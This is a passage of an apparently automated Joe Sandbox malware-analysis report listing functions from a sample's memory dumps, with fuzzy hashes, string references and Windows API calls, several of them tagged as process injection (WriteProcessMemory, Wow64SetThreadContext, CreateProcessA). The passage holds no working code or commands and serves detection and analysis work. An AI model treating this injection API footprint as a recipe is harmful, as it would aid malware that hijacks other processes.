,iq, xrefs: 0553EE17
(oeq, xrefs: 0553F079
(oeq, xrefs: 0553F083
Hiq, xrefs: 0553F0F0
,iq, xrefs: 0553EE07

Memory Dump Source

Source File: 00000000.00000002.2031092098.0000000005530000.00000040.00000800.00020000.00000000.sdmp, Offset: 05530000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5530000_nD2ozRD7MN.jbxd

Similarity

API ID:
String ID: (oeq$(oeq$,iq$,iq$Hiq
API String ID: 0-2750058203
Opcode ID: 8bc1eb90a41d2c2ac4b5c9c6bac9c72b57162480f1123032358013c98c6821c9
Instruction ID: 5ae8b33897c208f769f07d5107063d0c8c1cd53dfc56eeabb7495dcbcfbd1655
Opcode Fuzzy Hash: 8bc1eb90a41d2c2ac4b5c9c6bac9c72b57162480f1123032358013c98c6821c9
Instruction Fuzzy Hash: FE526175B001159FCB18DF69C886A6E7BF6FF88310F158169E80A9B3A5DB34EC41CB90

Function 0741AEF8 Relevance: 6.9, Strings: 5, Instructions: 627
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Hiq, xrefs: 0741BDA3
Hiq, xrefs: 0741BE2D
Hiq, xrefs: 0741BD1C
Hiq, xrefs: 0741BC89
Hiq, xrefs: 0741BEEB

Memory Dump Source

Source File: 00000000.00000002.2035942910.0000000007410000.00000040.00000800.00020000.00000000.sdmp, Offset: 07410000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7410000_nD2ozRD7MN.jbxd

Similarity

API ID:
String ID: Hiq$Hiq$Hiq$Hiq$Hiq
API String ID: 0-1376665358
Opcode ID: ae40e662060af10a8029354abc0cd6711699e99f34d83ffca2404238a568da17
Instruction ID: 02b4bad259f1d0b5a19e306fd8face7f4e605c3f47b5b2c0d866aa884468d8cc
Opcode Fuzzy Hash: ae40e662060af10a8029354abc0cd6711699e99f34d83ffca2404238a568da17
Instruction Fuzzy Hash: CE3283B0E102198FDB55EFA9C8507AEBBF2FF84340F14816AD409AB399DB349D45CB91

Function 07F32106 Relevance: 1.8, Strings: 1, Instructions: 562COMMON

Download Yara Rule

Strings

D, xrefs: 07F3210B

Memory Dump Source

Source File: 00000000.00000002.2037425052.0000000007F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7f30000_nD2ozRD7MN.jbxd

Similarity

API ID:
String ID: D
API String ID: 0-2746444292
Opcode ID: ffdf5c3ae2035565d5ef9d45ebae74e443cd09508446a4f81d6479e6c1915bc9
Instruction ID: 0760d3e091ed41e04c760256106c905d8768c8f79f6b84890eafa2ccacfb2b80
Opcode Fuzzy Hash: ffdf5c3ae2035565d5ef9d45ebae74e443cd09508446a4f81d6479e6c1915bc9
Instruction Fuzzy Hash: B052BB74A112298FCB65DF64D998A9DBBB6FF89300F1041D9D50EA73A5CB30AE81CF50

Function 07F36CE8 Relevance: .7, Instructions: 668COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2037425052.0000000007F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7f30000_nD2ozRD7MN.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 306659da7582787cd1ffc93de83bcb69fa54d47da7613f12677d2869658cdd3f
Instruction ID: 4efd38168eaa10a134980d79856f56d4182392969c5511f5481f55c6e43ca09a
Opcode Fuzzy Hash: 306659da7582787cd1ffc93de83bcb69fa54d47da7613f12677d2869658cdd3f
Instruction Fuzzy Hash: D9522AB0A00605CFCB55EF68C588A5DB7F2FF89314F5985A8E40A9B361DB31ED86CB50

Function 055327A8 Relevance: .6, Instructions: 588COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2031092098.0000000005530000.00000040.00000800.00020000.00000000.sdmp, Offset: 05530000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5530000_nD2ozRD7MN.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 50e72270afbdafd55bdc366353163728c9e63da164a4b5fefa7f8192df1a73dd
Instruction ID: 6575fa41a9df407c7f1b5b1e508fc0854ea21183ee31424d29adc84a1975671c
Opcode Fuzzy Hash: 50e72270afbdafd55bdc366353163728c9e63da164a4b5fefa7f8192df1a73dd
Instruction Fuzzy Hash: 75524E34A007068FCB15DF28C844B99B7B2FF85314F2586A9D5586F3A2DB71A986CF81

Function 05532798 Relevance: .6, Instructions: 579COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2031092098.0000000005530000.00000040.00000800.00020000.00000000.sdmp, Offset: 05530000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5530000_nD2ozRD7MN.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8bff1da8935feeaf10e27f0a90616fa23196d2c22264f945dc535167e2da9abf
Instruction ID: 955f117af9fffdfce4e7464971642894949aa91820a0bd9a8fa6cd3e25d81d91
Opcode Fuzzy Hash: 8bff1da8935feeaf10e27f0a90616fa23196d2c22264f945dc535167e2da9abf
Instruction Fuzzy Hash: 13525F34A007068FCB15DF28C844B99B7B2FF85314F2586E9D5586F3A2DB71A986CF81

Function 074121B0 Relevance: .6, Instructions: 554COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2035942910.0000000007410000.00000040.00000800.00020000.00000000.sdmp, Offset: 07410000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7410000_nD2ozRD7MN.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ccfcebe535c357f64805ccea35be87de0532e453734c13001792afab4efa410b
Instruction ID: b53cb3a31d788d6e59b91542d6f7148276c8b2b3210dc60a2e7d0819afd2ea54
Opcode Fuzzy Hash: ccfcebe535c357f64805ccea35be87de0532e453734c13001792afab4efa410b
Instruction Fuzzy Hash: 25422C70E1061A8FCB14EF68C8506DDF7B1FF89300F1486AAD459AB355EB70AA85CF91

Function 074E2348 Relevance: .5, Instructions: 506COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2036240745.00000000074E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_74e0000_nD2ozRD7MN.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 105d28ea7c67469a95230b073cc84dd3dffd051a89da76754aa175b181ca4504
Instruction ID: 474e52428d22939644f3ca400e9e28d86eb5f19522428a4096ff994ef9025cb5
Opcode Fuzzy Hash: 105d28ea7c67469a95230b073cc84dd3dffd051a89da76754aa175b181ca4504
Instruction Fuzzy Hash: 044282B4E11219CFDB64CFA9C984BADBBB6FF48311F1481A9E809A7355D730A981CF50

Function 074E1078 Relevance: .5, Instructions: 482COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2036240745.00000000074E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_74e0000_nD2ozRD7MN.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e98e5a33e495a055c31b55e11ce38309f4fdd0242557e388d7d11e2f499e4fa0
Instruction ID: a419ef17cd82e0bae6c5f2df2dc94054dba3ba4801bbc9d230472f6a46db6333
Opcode Fuzzy Hash: e98e5a33e495a055c31b55e11ce38309f4fdd0242557e388d7d11e2f499e4fa0
Instruction Fuzzy Hash: 9432C2B4901219CFDB50DFA9C584A8EFBF6BF49316F55C196D408AB221DB30E985CFA0

Function 074123F0 Relevance: .4, Instructions: 377COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2035942910.0000000007410000.00000040.00000800.00020000.00000000.sdmp, Offset: 07410000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7410000_nD2ozRD7MN.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 341c8dd18cc76df77685724e35cd3fdf3652315d2686d110bde3021b3e6e30ce
Instruction ID: d49e9ec27e4622af481703e915c4f3473cf162016e591f8e958b92d47549864d
Opcode Fuzzy Hash: 341c8dd18cc76df77685724e35cd3fdf3652315d2686d110bde3021b3e6e30ce
Instruction Fuzzy Hash: E712D971D1071ACFCB10EF69C8806D9F7B1BF89300F0586AAD858A7215EB70AAC5CF80

Function 07F36CD8 Relevance: .3, Instructions: 293COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2037425052.0000000007F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7f30000_nD2ozRD7MN.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1857c522b8e9a2ac658c8fb150a7e62b692511c796177beee101af3242c07150
Instruction ID: 214a0409d687c76a2dac5fe308f691c0367e3fb7d17b536b0ea4cc817eef8e0e
Opcode Fuzzy Hash: 1857c522b8e9a2ac658c8fb150a7e62b692511c796177beee101af3242c07150
Instruction Fuzzy Hash: B9D1D3B4A00205CFDB14DF68C588AA8B7F2FF44315F6A85A9E409DB261DB31FD86CB50

Function 0741B6B8 Relevance: .3, Instructions: 281COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2035942910.0000000007410000.00000040.00000800.00020000.00000000.sdmp, Offset: 07410000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7410000_nD2ozRD7MN.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e7f655d8a18bc14b97d858bf14fe431f921a4df800581107d5f4b352d906da76
Instruction ID: d04b4ec090487988573ecf19419d9edf13cd49614bb3c4f2073585ff0f27fe3b
Opcode Fuzzy Hash: e7f655d8a18bc14b97d858bf14fe431f921a4df800581107d5f4b352d906da76
Instruction Fuzzy Hash: 33C14CB1E00219CFDB15EFA5C8807DEBBB2EF89314F14C5AAD449AB255EB309985CF50

Function 013F703A Relevance: .2, Instructions: 190COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2013998323.00000000013F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_13f0000_nD2ozRD7MN.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4b25928059b0c77c73e9fcd03d1298b1d0cc124c43272c53525e9280649a5acc
Instruction ID: 324b84077f61b4ab0b86ba81847c873cb30083c93c8e50072b0b5345a52e3773
Opcode Fuzzy Hash: 4b25928059b0c77c73e9fcd03d1298b1d0cc124c43272c53525e9280649a5acc
Instruction Fuzzy Hash: 2C91C374E002199FDB15DFA9C890AEEBBF2FF88300F10806AD519AB369DB355946CF50

Function 013F3E34 Relevance: .2, Instructions: 187COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2013998323.00000000013F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_13f0000_nD2ozRD7MN.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c5793e4d2688bd52a0283a6a86802923b8bb522640235aacfe15a5f34d2adaf1
Instruction ID: dab4ca996e5672264bf2df4d567e89074c7c8a0b022cec7a423da83aea83778c
Opcode Fuzzy Hash: c5793e4d2688bd52a0283a6a86802923b8bb522640235aacfe15a5f34d2adaf1
Instruction Fuzzy Hash: 9981B474E002199FDB15DFA9D894AEEBBF2FF88300F10806AE519AB364DB345945CF50

Function 074E2338 Relevance: .2, Instructions: 151COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2036240745.00000000074E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_74e0000_nD2ozRD7MN.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ac7f6815a37a3b5773d54a84f4d4635446548a08bee9b1fbd89f06969e73891a
Instruction ID: 8f5c40be44d56ee30d5405f113c09fed69d0466df27174bca1d7442b2c7c60a9
Opcode Fuzzy Hash: ac7f6815a37a3b5773d54a84f4d4635446548a08bee9b1fbd89f06969e73891a
Instruction Fuzzy Hash: D861C574E01618CFDB18CFAAC984BDDBBB6BF88311F1481AAE809A7355DB719941CF50

Function 082B1667 Relevance: .1, Instructions: 112COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2037902914.00000000082B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 082B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_82b0000_nD2ozRD7MN.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 580f97f2dbef535e47d0857fb2bcc823a1e5f8e776dcc123e794c2f5aedfb96d
Instruction ID: 98723b277d19331c711d439d5401e08b2f746dab0daceb3325f77cdd07402d1a
Opcode Fuzzy Hash: 580f97f2dbef535e47d0857fb2bcc823a1e5f8e776dcc123e794c2f5aedfb96d
Instruction Fuzzy Hash: 7C411774A2A228CFDB24CF64C8547E8BBB8FB09342F1491D9D50DA7291DBB05AC5CF40

Function 082B16E2 Relevance: .1, Instructions: 110COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2037902914.00000000082B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 082B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_82b0000_nD2ozRD7MN.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d5bcfd3142b9229876d8263f77094a936be88e01c60b0cc6511d8b22f7166a29
Instruction ID: 3312b250ba0f2a3e9d360678160c52f4bd8571a0ea2e50661a4a1c07e1f35493
Opcode Fuzzy Hash: d5bcfd3142b9229876d8263f77094a936be88e01c60b0cc6511d8b22f7166a29
Instruction Fuzzy Hash: DE41073492A218CFCB24CF64D9947E8BBB8FB4A342F0091EAD40DA7291DB705E95CF40

Function 074E1069 Relevance: .1, Instructions: 108COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2036240745.00000000074E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_74e0000_nD2ozRD7MN.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 03eca5c3f852c4fd4175668396bdd7699249c4b552f5d063c1bf7ec75e576a79
Instruction ID: 34ca4883c8d3b618bbd3d048f6d90cfcbdd350b96ea335b0b1bb7db58724cb4a
Opcode Fuzzy Hash: 03eca5c3f852c4fd4175668396bdd7699249c4b552f5d063c1bf7ec75e576a79
Instruction Fuzzy Hash: D841DAB1E006198FEB58DFAAC9407DEBBB7BFC8300F14C0AAD458A6255DB341A458F51

Function 013FD530 Relevance: 6.1, APIs: 4, Instructions: 136
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 013FD5BE
GetCurrentThread.KERNEL32 ref: 013FD5FB
GetCurrentProcess.KERNEL32 ref: 013FD638
GetCurrentThreadId.KERNEL32 ref: 013FD691

Memory Dump Source

Source File: 00000000.00000002.2013998323.00000000013F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_13f0000_nD2ozRD7MN.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: be6bc1a829d8d168fc72fc3f7f1481adcfab5eecb23c0adb7d1436d61fa61821
Instruction ID: 3f452d74d5e598f5d9d07daa27a8f47a17b3b220bbf3a811a5c3555d9f7d14ac
Opcode Fuzzy Hash: be6bc1a829d8d168fc72fc3f7f1481adcfab5eecb23c0adb7d1436d61fa61821
Instruction Fuzzy Hash: C35143B0900249CFDB15CFAAD948BDEBFF1EF49318F24845DE109A72A1D7745888CB25

Function 013FD540 Relevance: 6.1, APIs: 4, Instructions: 128
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 013FD5BE
GetCurrentThread.KERNEL32 ref: 013FD5FB
GetCurrentProcess.KERNEL32 ref: 013FD638
GetCurrentThreadId.KERNEL32 ref: 013FD691

Memory Dump Source

Source File: 00000000.00000002.2013998323.00000000013F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_13f0000_nD2ozRD7MN.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: 376bd654e12a5b1d19dbffab044a6514ec6c923d79f25fac22945e06af2ff016
Instruction ID: c75b2cd29361e08eb83fa3f4c58dbe338bed938f1b76a224718ce5e0523ce4e9
Opcode Fuzzy Hash: 376bd654e12a5b1d19dbffab044a6514ec6c923d79f25fac22945e06af2ff016
Instruction Fuzzy Hash: CC5153B0900249CFDB14CFAAD948B9EBBF1EF48318F208459E109A72A1D7346984CB65

Function 07F3D580 Relevance: 2.8, Strings: 2, Instructions: 295
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

PHeq, xrefs: 07F3D85C
PHeq, xrefs: 07F3D6EE

Memory Dump Source

Source File: 00000000.00000002.2037425052.0000000007F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7f30000_nD2ozRD7MN.jbxd

Similarity

API ID:
String ID: PHeq$PHeq
API String ID: 0-3382621680
Opcode ID: 757fcd88e8212cca5002d2dde4a0e44e8667ec74eb07fe38e9fdad15f360d00d
Instruction ID: 02cd584536699fb4548ac949a2640e080f9323ad50b124a263454fb753f520cf
Opcode Fuzzy Hash: 757fcd88e8212cca5002d2dde4a0e44e8667ec74eb07fe38e9fdad15f360d00d
Instruction Fuzzy Hash: 75C105B4B10609CFCB19DF68C594A9DBBF2FF89314B2545A8E416AB3A1DB31EC41CB50

Function 074EE984 Relevance: 1.7, APIs: 1, Instructions: 246processCOMMON

Download Yara Rule

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 074EEBC6

Memory Dump Source

Source File: 00000000.00000002.2036240745.00000000074E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_74e0000_nD2ozRD7MN.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 7cc01b697828726f6c57715aa14b0615b768bafc01414d627948505cd709a679
Instruction ID: 2292159ac8466a6d079b9c9c4392d187a3e8be73df4573852b9f62c783f08f8c
Opcode Fuzzy Hash: 7cc01b697828726f6c57715aa14b0615b768bafc01414d627948505cd709a679
Instruction Fuzzy Hash: 0AA170B1D0022ACFEB10CFA8C841BEEBBF5BF48325F14856AD849A7250D7759985CF91

Function 074EE990 Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON

Download Yara Rule

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 074EEBC6

Memory Dump Source

Source File: 00000000.00000002.2036240745.00000000074E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_74e0000_nD2ozRD7MN.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: a892ac309f375e983b775579f64de6eeda92d07a22de87943700acbf14fcc8b6
Instruction ID: 79b548e61dffe5aee7719a85681c1cceacc3c3f05606503f2c1e58f72d588654
Opcode Fuzzy Hash: a892ac309f375e983b775579f64de6eeda92d07a22de87943700acbf14fcc8b6
Instruction Fuzzy Hash: 559180B1D0022ACFEB10CF68C840BEEBBF5BF48325F14856AD849A7240D7759985CF91

Function 013FB298 Relevance: 1.7, APIs: 1, Instructions: 201COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 013FB4FE

Memory Dump Source

Source File: 00000000.00000002.2013998323.00000000013F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_13f0000_nD2ozRD7MN.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 2dd97436f1b5d3e8dcc476a5de92be6bdeea779d9a3a980b5fae17a6cbbbaae3
Instruction ID: bda0f9afb547642067597f2b362c4dc0e04ae20f7376146736e0e8cbe2d69ed2
Opcode Fuzzy Hash: 2dd97436f1b5d3e8dcc476a5de92be6bdeea779d9a3a980b5fae17a6cbbbaae3
Instruction Fuzzy Hash: 638159B0A00B058FD725DF2AD45479ABBF1FF88308F10892ED59ADBA54D774E849CB90

Function 013F4508 Relevance: 1.6, APIs: 1, Instructions: 96COMMON

Download Yara Rule

APIs

CreateActCtxA.KERNEL32(?), ref: 013F59E9

Memory Dump Source

Source File: 00000000.00000002.2013998323.00000000013F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_13f0000_nD2ozRD7MN.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 773cbeece9d6dc7a70e0ee9ae0b4494a147e7d2696fe8220148916c56819714f
Instruction ID: 5bbc4924f693227d42017c43bfbf06adbe9b9d28a3e7e5992ea16f444b5a897c
Opcode Fuzzy Hash: 773cbeece9d6dc7a70e0ee9ae0b4494a147e7d2696fe8220148916c56819714f
Instruction Fuzzy Hash: 0E41B2B0C00719CBDB24DFA9C844A9EBBF5BF49308F20815AD509AB255DB756949CF90

Function 013F592D Relevance: 1.6, APIs: 1, Instructions: 96COMMON

Download Yara Rule

APIs

CreateActCtxA.KERNEL32(?), ref: 013F59E9

Memory Dump Source

Source File: 00000000.00000002.2013998323.00000000013F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_13f0000_nD2ozRD7MN.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 6e97f5693209b7c03b085b8077b856c648780b341afc4735b9691a7788fcd409
Instruction ID: 62e9ae1cf8646533cfbff81153d22be7ea438a9f18cdba5af2bbae064832db74
Opcode Fuzzy Hash: 6e97f5693209b7c03b085b8077b856c648780b341afc4735b9691a7788fcd409
Instruction Fuzzy Hash: 1E41EEB0C00719CFEF24DFA9C884ADEBBB1BF49308F24815AD509AB255DB75694ACF50

Function 0741BFF0 Relevance: 1.6, APIs: 1, Instructions: 85COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2035942910.0000000007410000.00000040.00000800.00020000.00000000.sdmp, Offset: 07410000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7410000_nD2ozRD7MN.jbxd

Similarity

API ID: CreateFromIconResource
String ID:
API String ID: 3668623891-0
Opcode ID: 74ac4ea23ec9a6149b660fde3128124a8e93933fe488b0d7f19ff749858dee7c
Instruction ID: 37a72dbfe0cee58f471734c7d370be9a47f5549ffc64d11740619c18d7d776c3
Opcode Fuzzy Hash: 74ac4ea23ec9a6149b660fde3128124a8e93933fe488b0d7f19ff749858dee7c
Instruction Fuzzy Hash: B031BCB6904359DFCB02DFA9C844AEEBFF4EF49310F14805AE514A7261C3359854DFA1

Function 07418BBC Relevance: 1.6, APIs: 1, Instructions: 72COMMON

Download Yara Rule

APIs

DrawTextExW.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,0741A2A5,?,?), ref: 0741A357

Memory Dump Source

Source File: 00000000.00000002.2035942910.0000000007410000.00000040.00000800.00020000.00000000.sdmp, Offset: 07410000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7410000_nD2ozRD7MN.jbxd

Similarity

API ID: DrawText
String ID:
API String ID: 2175133113-0
Opcode ID: f8551716c78fa97f1f3238a2f78bae57514a99c0ac220c8f642e38ed3e9569e4
Instruction ID: f0c5cbddbf3c58b5a6208580966391a624a492dc73f65eba277fd8d961ee6046
Opcode Fuzzy Hash: f8551716c78fa97f1f3238a2f78bae57514a99c0ac220c8f642e38ed3e9569e4
Instruction Fuzzy Hash: 9F31C3B590134A9FDB10DF9AD884ADEFBF4FB48324F14842AE919A7310D775A944CFA0

Function 074EE700 Relevance: 1.6, APIs: 1, Instructions: 72injectionCOMMON

Download Yara Rule

APIs

WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 074EE798

Memory Dump Source

Source File: 00000000.00000002.2036240745.00000000074E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_74e0000_nD2ozRD7MN.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 9b5dfea366e4fe42b1ef28393baa4aeb6f4c0d379912de10f90132014c089249
Instruction ID: 694eea66b0607dde4237a0224265f92d0089e012bc7a95279b3e6d9a4460e23d
Opcode Fuzzy Hash: 9b5dfea366e4fe42b1ef28393baa4aeb6f4c0d379912de10f90132014c089249
Instruction Fuzzy Hash: E3215AB59003199FDB10CFA9C985BDEBBF5FF48324F50842AE918A7340C7789944DBA0

Function 0741A2B9 Relevance: 1.6, APIs: 1, Instructions: 70COMMON

Download Yara Rule

APIs

DrawTextExW.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,0741A2A5,?,?), ref: 0741A357

Memory Dump Source

Source File: 00000000.00000002.2035942910.0000000007410000.00000040.00000800.00020000.00000000.sdmp, Offset: 07410000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7410000_nD2ozRD7MN.jbxd

Similarity

API ID: DrawText
String ID:
API String ID: 2175133113-0
Opcode ID: cb43eaecd6d959a8f19dc3ec876090bb14327f0b4fee61f2e8f7c112952b95bc
Instruction ID: 6ccdd1e4dc5dbc7ba93879013a6474b9de2a78f6f7aa0af40e6fd00fd8939bfe
Opcode Fuzzy Hash: cb43eaecd6d959a8f19dc3ec876090bb14327f0b4fee61f2e8f7c112952b95bc
Instruction Fuzzy Hash: 3031E2B590120A9FDB10CF99D984ADEFBF4BF48310F18842AE519A7310D774A945CFA0

Function 074EE708 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON

Download Yara Rule

APIs

WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 074EE798

Memory Dump Source

Source File: 00000000.00000002.2036240745.00000000074E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_74e0000_nD2ozRD7MN.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 9afc47b3e6819714595944efd2379de6d668f4c75fc1b2648ac771282cc6326d
Instruction ID: b4b5a850eeda4b2b92be5067f98eca597e71283c801bf8db25d8b1a9b18ac73a
Opcode Fuzzy Hash: 9afc47b3e6819714595944efd2379de6d668f4c75fc1b2648ac771282cc6326d
Instruction Fuzzy Hash: 7A2139B5900319DFDB10CFA9C985BDEBBF5FF48324F10882AE918A7240D7789944DBA0

Function 074EE7F1 Relevance: 1.6, APIs: 1, Instructions: 65COMMON

Download Yara Rule

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 074EE878

Memory Dump Source

Source File: 00000000.00000002.2036240745.00000000074E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_74e0000_nD2ozRD7MN.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: 5384f9c821cc4bcfa2aad3f685b756284f9bf52b85f1a9a9ad98fad4d73e48de
Instruction ID: e923d911742f3affab849f05cde1f367e17aa2cf930a62c7e1a66cd0733cbad7
Opcode Fuzzy Hash: 5384f9c821cc4bcfa2aad3f685b756284f9bf52b85f1a9a9ad98fad4d73e48de
Instruction Fuzzy Hash: C32159B1C002599FDB10DFAAC980BEEFBF5FF48320F50842AE918A7240C7359941DBA0

Function 074EE569 Relevance: 1.6, APIs: 1, Instructions: 65threadCOMMON

Download Yara Rule

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 074EE5EE

Memory Dump Source

Source File: 00000000.00000002.2036240745.00000000074E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_74e0000_nD2ozRD7MN.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: c7b3d58a17c40bbf25f3d86a24151b1b07107d34f7df21bf63a849e45f6e3b19
Instruction ID: ec3a8ff264b2a7fa5823b403e9100cdfedf32dd23624c28951cbd910bc242ce0
Opcode Fuzzy Hash: c7b3d58a17c40bbf25f3d86a24151b1b07107d34f7df21bf63a849e45f6e3b19
Instruction Fuzzy Hash: 202168B1D003198FDB10CFAAC9857EEBBF8EF48324F14842AD419A7241DB789944CFA0

Function 013FD780 Relevance: 1.6, APIs: 1, Instructions: 64COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 013FD80F

Memory Dump Source

Source File: 00000000.00000002.2013998323.00000000013F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013F0000, based on PE: false

Joe Sandbox IDA Plugin

